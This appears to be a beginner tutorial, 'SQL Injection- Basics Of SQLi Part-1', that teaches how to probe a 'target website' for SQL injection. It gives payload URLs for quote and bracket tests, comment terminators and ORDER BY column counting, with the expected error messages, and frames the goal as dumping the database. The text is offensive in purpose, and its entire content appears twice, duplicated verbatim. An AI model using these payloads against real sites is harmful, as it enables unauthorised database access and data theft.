SQL Injection- Basics Of SQLi Part-1
SQL( Structured Query Language ) Injection is one of Most Powerful Methods of System Penetration.
SQL Injection is a Code Injection Technique that Exploits a Security Vulnerability Occurring in the Database Layer of an Application. Attacker Send His Commands TO Web Application For Dumping Database .
So Lets Start !
First Check If Our target Website is Vulnerable for SQL Injection . eg
We mostly Use Single Quote '
https://www.site.com/index.php?id=1'
And we Get Error . It Means That Site Is Vulnerable For SQL Injection.
Here Some Other Ways To Check Website Vulnerbility.
Using Closed Bracket )
https://www.site.com/index.php?id=1)
Using Single Quote '
https://www.site.com/index.php?id=1'
Using Double Quote "
https://www.site.com/index.php?id=1"
Now Next Step Is To Count Total Number Of Columns .
First Check Comment Type to Balance Our Query.
Here Are Some Basic Comments .
https://www.site.com/index.php?id=1--
https://www.site.com/index.php?id=1--+
https://www.site.com/index.php?id=1-- -
https://www.site.com/index.php?id=1--+-
https://www.site.com/index.php?id=1%23
https://www.site.com/index.php?id=1;
After Balancing Our Query Lets Count Total Number Of Columns.We Can Count Columns Using Order By or Group By Statement .
https://www.site.com/index.php?id=1 order By 1--
No Error,
https://www.site.com/index.php?id=1 order by 2--
No Error,
https://www.site.com/index.php?id=1 order by 3--
No error,
https://www.site.com/index.php?id=1 order by 4--
We Got Error .
Unknown column '4' in 'order clause'
It Means Total Number Of Columns Are 3.
it is Integer Based SQL Injection.
But Some Times We Injecting A Site And Column Count Is 1000 But Nothing Show.eg
https://www.site.com/index.php?id=1 order by 10000--
it means Its String Based SQL Injection. lets Add Single Quote ' in Our Query.
https://www.site.com/index.php?id=1' order by 10000--
and We Got Error.
Unknown column '10000' in 'order clause'
https://www.site.com/index.php?id=1' order by 4--
Again Error.Unknown column '4' in 'order clause'
https://www.site.com/index.php?id=1' order by 3--
No Error!! Total Number Of Columns are 3.
In My Next Tutorials We Will Discuss About Finding Vulnerable Columns With Diffirent Techniques And WAF Bypassing.
We Will Continue Our Tutorials.
SQL( Structured Query Language ) Injection is one of Most Powerful Methods of System Penetration.
SQL Injection is a Code Injection Technique that Exploits a Security Vulnerability Occurring in the Database Layer of an Application. Attacker Send His Commands TO Web Application For Dumping Database .
So Lets Start !
First Check If Our target Website is Vulnerable for SQL Injection . eg
We mostly Use Single Quote '
https://www.site.com/index.php?id=1'
And we Get Error . It Means That Site Is Vulnerable For SQL Injection.
Here Some Other Ways To Check Website Vulnerbility.
Using Closed Bracket )
https://www.site.com/index.php?id=1)
Using Single Quote '
https://www.site.com/index.php?id=1'
Using Double Quote "
https://www.site.com/index.php?id=1"
Now Next Step Is To Count Total Number Of Columns .
First Check Comment Type to Balance Our Query.
Here Are Some Basic Comments .
https://www.site.com/index.php?id=1--
https://www.site.com/index.php?id=1--+
https://www.site.com/index.php?id=1-- -
https://www.site.com/index.php?id=1--+-
https://www.site.com/index.php?id=1%23
https://www.site.com/index.php?id=1;
After Balancing Our Query Lets Count Total Number Of Columns.We Can Count Columns Using Order By or Group By Statement .
https://www.site.com/index.php?id=1 order By 1--
No Error,
https://www.site.com/index.php?id=1 order by 2--
No Error,
https://www.site.com/index.php?id=1 order by 3--
No error,
https://www.site.com/index.php?id=1 order by 4--
We Got Error .
Unknown column '4' in 'order clause'
It Means Total Number Of Columns Are 3.
it is Integer Based SQL Injection.
But Some Times We Injecting A Site And Column Count Is 1000 But Nothing Show.eg
https://www.site.com/index.php?id=1 order by 10000--
it means Its String Based SQL Injection. lets Add Single Quote ' in Our Query.
https://www.site.com/index.php?id=1' order by 10000--
and We Got Error.
Unknown column '10000' in 'order clause'
https://www.site.com/index.php?id=1' order by 4--
Again Error.Unknown column '4' in 'order clause'
https://www.site.com/index.php?id=1' order by 3--
No Error!! Total Number Of Columns are 3.
In My Next Tutorials We Will Discuss About Finding Vulnerable Columns With Diffirent Techniques And WAF Bypassing.
We Will Continue Our Tutorials.